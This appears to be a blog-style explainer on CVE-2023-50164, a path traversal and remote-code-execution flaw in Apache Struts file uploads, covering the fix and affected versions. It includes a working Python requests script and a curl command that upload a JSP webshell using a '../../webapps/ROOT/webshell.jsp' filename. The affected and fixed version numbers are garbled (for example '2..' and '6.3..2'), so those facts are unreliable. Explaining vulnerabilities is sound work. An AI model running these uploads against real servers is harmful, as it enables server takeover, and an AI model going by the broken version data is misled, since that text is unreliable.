CVE-2023-50164 - Path Traversal & Remote Code Execution in Apache Struts - Explained with Exploits, Code, and Fixes

---

Apache Struts is a widely used web application framework for Java that helps developers build robust enterprise-grade applications. But in late 2023, a critical security flaw was discovered: CVE-2023-50164. This vulnerability lets hackers manipulate file upload parameters, traverse directories, and—under the right conditions—upload malicious files, sometimes even leading to Remote Code Execution (RCE).

If you're using Struts, it’s vital to learn about this bug. Here’s what you need to know, boiled down into simple language, with code snippets, links, and real exploit details.

What is CVE-2023-50164?

This vulnerability impacts the file upload functionality in Apache Struts. When an application allows file uploads (like profile images or documents), it should restrict where uploaded files are saved—ideally just to a single, safe folder. However, due to improper input validation, a hacker can:

Change the upload parameters to specify a file path anywhere on the server

- Use “../” (dot-dot slash) path traversal tricks to climb out of the intended directory
- Under certain setups, upload a script or binary that gets executed remotely—leading to full Remote Code Execution!

Who is Affected?

If your Struts app allows users to upload files and you’re running a vulnerable version, you’re at risk. This especially includes Struts 2.. to 2.5.32 and 6.. to 6.3..1.

Recommended Fix:
Amazon, Red Hat, and Apache all strongly recommend updating to Struts 2.5.33, Struts 6.3..2, or later.

Normal Upload:

The application lets users POST files to /upload, stored in /uploads/user-file.jpg.

Malicious Upload:

The attacker tweaks the form field or sends a custom HTTP POST request where the filename looks like this:

`

../../webapps/yourapp/WEB-INF/webshell.jsp

`

Now the application stores the file outside /uploads/, placing it directly in the webroot. If the server executes .jsp files, the attacker can upload a webshell, which means full control over your server.

Here’s a Python example using requests

import requests

url = 'http://vulnerable-struts-app/upload.action';
files = {
    'file': (
        '../../webapps/ROOT/webshell.jsp', 
        '<% out.println("Shell!"); %>', 
        'application/octet-stream'
    )
}

response = requests.post(url, files=files)
print("Status:", response.status_code)

If the server is vulnerable and accepts the path traversal, your shell will land at http://vulnerable-struts-app/webshell.jsp

You can do this attack with just curl

curl -F 'file=@malicious.jsp;filename=../../webapps/ROOT/webshell.jsp' \
  http://vulnerable-struts-app/upload.action

Data Theft: Access to configuration or sensitive data files.

- Full RCE: If attackers upload a shell (like a JSP backdoor), they can execute commands, install malware, or pivot further inside your network.

Important: This bug is not always limited to RCE; attackers can also upload files to poison logs or crash the server. But RCE is the worst-case scenario.

References & Further Reading

- CVE-2023-50164 NVD Entry
- Apache Struts Security Bulletin
- Exploit Details on GitHub
- Struts Upgrade Instructions

Wrap Up

CVE-2023-50164 is a powerful illustration of how a tiny oversight—missing or weak validation on file upload parameters—can crack open a whole server to hackers. The fix is clear: upgrade your Struts now and audit your upload logic. Don’t wait for an incident!

If you’re worried or have doubts, you can try the sample exploit on your own non-production systems (never on unauthorized targets!) or use automated vulnerability scanners to double-check.

Timeline

Published on: 12/07/2023 09:15:07 UTC
Last modified on: 12/12/2023 17:01:42 UTC